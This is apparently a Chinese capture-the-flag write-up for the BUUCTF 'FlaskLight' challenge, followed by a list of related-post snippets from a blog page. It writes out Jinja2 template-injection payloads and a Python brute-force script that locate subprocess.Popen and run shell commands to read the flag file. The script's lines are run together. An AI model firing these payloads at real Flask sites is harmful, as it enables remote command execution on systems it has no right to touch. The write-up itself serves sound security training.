题目地址:https://buuoj.cn/challenges#[CSCCTF%202019%20Qual]FlaskLight

?search={{7*7}}
#通过回显判断SSTI

?search={{''.__class__.__mro__[2].__subclasses__()}}
#爆出所有类

编写脚本查找可利用的类
利用subprocess.Popen执行命令

import requests
import re
import html
import timeindex = 0
for i in range(170, 1000):try:url = "http://17ad255a-204e-4624-b878-e3e0d62e526a.node3.buuoj.cn/?search={{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"r = requests.get(url)res = re.findall("<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r.text)time.sleep(0.1)# print(res)# print(r.text)res = html.unescape(res[0])print(str(i) + " | " + res)if "subprocess.Popen" in res:index = ibreakexcept:continue
print("indexo of subprocess.Popen:" + str(index))
?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls /flasklight',shell=True,stdout=-1).communicate()[0].strip()}}?search={{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}

原文作者:D15h35
链接:https://yanmymickey.github.io/2020/04/15/CTFwp/%5BCSCCTF%202019%20Qual%5DFlaskLight/

BUUCTF:[CSCCTF 2019 Qual]FlaskLight相关推荐

  1. [CSCCTF 2019 Qual] FlaskLight

    信息收集 index大致就这样,没什么信息 F12看下,发现了线索:search参数 试下ssti 基本就是ssti了 漏洞利用 config 也是 Flask模版中的一个全局对象,它包含了所有应用程 ...

  2. 一道[CSCCTF 2019 Qual]FlaskLight的详解再遇SSTI

    目录 SSTI 无二次渲染的示例 存在二次渲染的示例 漏洞复现 [CSCCTF 2019 Qual]FlaskLight 做这道题的时候,再次深入了解了一下SSTI,不过发现去讲解这题原理的文章实在是 ...

  3. [CSCCTF 2019 Qual]FlaskLight——直取flag?

    [CSCCTF 2019 Qual]FlaskLight 前言 白天一直在上课,晚上赶快躲进图书馆里面打打靶场.这次的题目算是很简单的一道题目了,我做完之后还去看了看其他师傅写的博客,只能感叹一声太强 ...

  4. ssti练习之[CSCCTF 2019 Qual]FlaskLight 1

    [CSCCTF 2019 Qual]FlaskLight 1 查看网页源代码,发现里面的提示 尝试输入url http://e1f8bf68-fab7-482f-901b-12c336d1cdeb.n ...

  5. [CSCCTF 2019 Qual]FlaskLight SSTI注入

    进去后页面提示你是flask框架,f12里面告诉你参数名字叫做search并且用GET方法传输,十有八九是模块注入了,用7*7试试服务端模板注入攻击 - 知乎 可以发现在searched后面输出了49 ...

  6. [CSCCTF 2019 Qual]FlaskLight 记录

    这个根据题目名字,flask模板注入,找注入点 查看源码发现GET传参 直接测试模板注入 常规模板注入 试了试之前做过的模板注入,都行不通 然后百度了一波,原来这是python2的 难怪不行 {{'' ...

  7. BUUCTF:[SUCTF 2019]Game

    https://buuoj.cn/challenges#[SUCTF%202019]Game index.html中发现一串base32 >>> import base64 > ...

  8. BUUCTF:[watevrCTF 2019]Evil Cuteness

    题目地址:https://buuoj.cn/challenges#[watevrCTF%202019]Evil%20Cuteness binwalk分析,发现zip压缩包,使用dd命令分离提取压缩包 ...

  9. 逆向迷宫题总结(持续更新) 2020华南师大CTF新生赛maze,攻防世界新手区:NJUPT CTF 2017,BUUCTF:不一样的flag

    CTF逆向入门:迷宫题学习记录(持续更新) ** 目录 **CTF逆向入门:迷宫题学习记录(持续更新)** (前言) 一. 逆向迷宫题概述 二. 具体题目分析 1. 2019华南师大CTF新生赛maz ...

最新文章

  1. linux的裁剪过程,让你的小linux更加完善,赶快试试吧!
  2. Red Hat Linux 挂载外部资源
  3. 计算机网络第4版潘爱民_学术活动 钱江会计实务精英讲坛预告(第84期)| 何继昌 : 战略视角下之财务分析应用实践 兼选股案例分享...
  4. 【STM32】位带原理分析和应用
  5. 我的Go语言学习之旅七:创建一个GUI窗体
  6. vue echarts div变化_数据可视化之echarts在Vue中的使用
  7. 自立,霸者的生存之道
  8. Docker 管理之 --- 资源限制
  9. hive查询数据库总条数
  10. js数组倒序reverse
  11. 虚拟机的不同网络模式
  12. 1193 Eason
  13. paperswithcode使用方法
  14. 英语作文计算机用途80词,初3英语作文_关于介绍电脑的英语作文,初三,80词左右。急!!!...
  15. Kubernetes - CPU 单位
  16. Ubuntu安装常用Linux桌面系统
  17. 从平台到中台 | Elasticsearch 在蚂蚁金服的实践经验
  18. python中变量无须先创建和赋值而直接使用_python综合练习1
  19. oracle中spool命令的使用,Oracle中Spool命令的使用方法实例
  20. android layout_gravity gravity

热门文章

  1. vSphere 6.5配置使用vMotion高级特性
  2. c语言调色板5个参数,R语言中的颜色以及色板
  3. 数电与、或、非、与非、或非、与或、同或
  4. idea如何设置代理实现管理突破呢
  5. Python:学习成绩管理系统
  6. [Centos7]Mirai QQ机器人监听播报TeamSpeak3用户状态
  7. 漫游测试之性能测试(5.4-执行计划)
  8. 品悟C 抛弃C程序设计中的谬误与恶习 pdf
  9. R语言心得说:R语言之xlsx包读写Excel数据
  10. 5.9.1_P163《C++ Primer Plus (6th)》编程练习 答案